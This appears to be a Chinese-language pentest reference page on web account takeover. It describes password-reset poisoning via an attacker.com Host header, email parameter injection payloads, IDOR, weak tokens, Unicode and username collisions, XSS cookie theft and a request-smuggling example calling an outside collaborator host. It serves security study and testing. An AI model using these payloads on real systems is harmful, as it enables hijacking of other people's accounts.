账户接管技术

目的与范围

本文档涵盖了用于在 Web 应用程序中未经授权访问用户帐户的方法和技术。它侧重于利用身份验证、密码重置机制和多因素身份验证 (MFA) 系统中的漏洞。有关 JWT 特定漏洞的信息，请参阅JSON Web Token (JWT) 攻击。

账户接管向量概述

账户接管 (ATO) 攻击利用身份验证和账户管理系统中的弱点。主要攻击向量可分为三类

来源： Account Takeover/README.md3-20 Account Takeover/mfa-bypass.md3-4

密码重置漏洞

密码重置功能通常包含可被利用来接管账户的漏洞。这些漏洞通常发生在令牌生成、传递或验证过程中。

密码重置攻击流程

来源： Account Takeover/README.md22-121

常见密码重置漏洞

漏洞	描述	攻击方法
令牌通过 Referer 泄露	重置令牌在 Referer 标头中泄露	拦截从重置页面到第三方网站的请求
重置毒化	Host 标头操纵导致重置链接指向攻击者域	修改重置请求中的 Host、X-Forwarded-Host 标头
邮箱参数操纵	接受多种邮箱格式	使用 email=victim@mail.com,attacker@mail.com 或数组语法
API 中的 IDOR	密码 API 中没有适当的授权	修改请求中的用户标识符以针对受害者
弱令牌生成	可预测的重置令牌	基于用户数据或时间戳分析令牌模式
用户名冲突	用户名规范化问题	注册带有空格的相似用户名（例如，“admin ”）
Unicode 规范化	字符映射问题	使用相似的 Unicode 字符进行注册

来源： Account Takeover/README.md24-121

密码重置令牌通过 Referer 泄露

当用户点击密码重置链接然后导航到第三方网站（如社交媒体链接）时，密码重置令牌可能会在 Referer 标头中泄露。

攻击步骤

请求重置受害者邮箱的密码
点击密码重置链接
不修改密码，点击页面上的任何第三方链接
拦截请求以检查 referer 标头是否包含重置令牌

来源： Account Takeover/README.md24-31

账户接管通过密码重置毒化

此攻击操纵 HTTP 标头，将密码重置电子邮件重定向到攻击者控制的域。

攻击步骤

拦截密码重置请求
添加或修改标头，如 Host: attacker.com 或 X-Forwarded-Host: attacker.com
应用程序可能会使用提供的 host 生成密码重置链接
收集发送到攻击者域的令牌

请求示例

POST https://example.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: attacker.com

来源： Account Takeover/README.md33-47

通过邮箱参数操纵进行密码重置

许多应用程序接受邮箱参数的各种格式，这可以被利用来接收重置令牌的副本。

常见操纵技术

# Parameter pollution
email=victim@mail.com&email=hacker@mail.com

# Array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# Carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# Separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

来源： Account Takeover/README.md48-65

API 参数中的 IDOR

密码更改 API 中不安全的直接对象引用允许攻击者更改其他用户的密码。

攻击步骤

使用攻击者账户登录并导航到密码更改功能
使用 Burp Suite 等代理工具拦截请求
修改用户标识符（邮箱/ID）以针对受害者的账户

易受攻击的示例请求

POST /api/changepass
[...]
("form": {"email":"victim@email.com","password":"securepwd"})

来源： Account Takeover/README.md67-78

弱密码重置令牌

弱令牌生成算法可能创建可预测或可猜测的令牌。经常导致令牌可预测的因素

基于时间戳的生成
包含用户 ID
邮箱地址编码
姓名/传记数据
令牌长度短
缺乏令牌过期
令牌重用

来源： Account Takeover/README.md79-94

泄露密码重置令牌

一些应用程序可能会在 API 响应中泄露重置令牌

触发受害者邮箱的密码重置
检查服务器响应是否直接包含令牌
使用令牌完成密码重置过程

来源： Account Takeover/README.md95-99

用户名冲突导致的账户接管

用户名规范化不当的应用程序可能允许攻击者注册带有额外空格的相似用户名。

攻击步骤

注册一个用户名与受害者相似但带有额外空格的账户（例如，“admin ”）
请求重置该账户的密码
使用令牌重置受害者的密码

此漏洞已在 CTFd 中发现 (CVE-2020-7245)。

来源： Account Takeover/README.md101-109

因 Unicode 规范化问题导致的账户接管

Unicode 字符规范化在处理用户名或邮箱地址时可能导致意外行为。

示例

受害者账户： demo@gmail.com
攻击者账户： demⓞ@gmail.com (使用 Unicode 字符 'ⓞ')

应用程序在身份验证和密码重置过程中可能对此进行不同的规范化。

来源： Account Takeover/README.md111-121

通过 Web 漏洞进行的账户接管

各种 Web 应用程序漏洞可用于实现账户接管。这些攻击通常利用会话管理或输入验证缺陷。

来源： Account Takeover/README.md122-180

通过跨站脚本进行的账户接管

XSS 漏洞可用于窃取会话 Cookie 并接管账户

在应用程序或子域中查找 XSS 漏洞（特别是如果 Cookie 作用域为 *.domain.com）
使用 XSS 泄露受害者的会话 Cookie
使用窃取的 Cookie 以受害者身份进行身份验证

来源： Account Takeover/README.md124-129

通过 HTTP 请求走私进行的账户接管

HTTP 请求走私可能导致通过响应/请求队列毒化进行账户接管

检测 HTTP 请求走私漏洞 (CL.TE, TE.CL, 等)
构建一个会覆盖或前置到另一个用户请求的请求
捕获受害者的会话令牌或操纵其会话

走私请求示例

GET /  HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83

0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

来源： Account Takeover/README.md130-168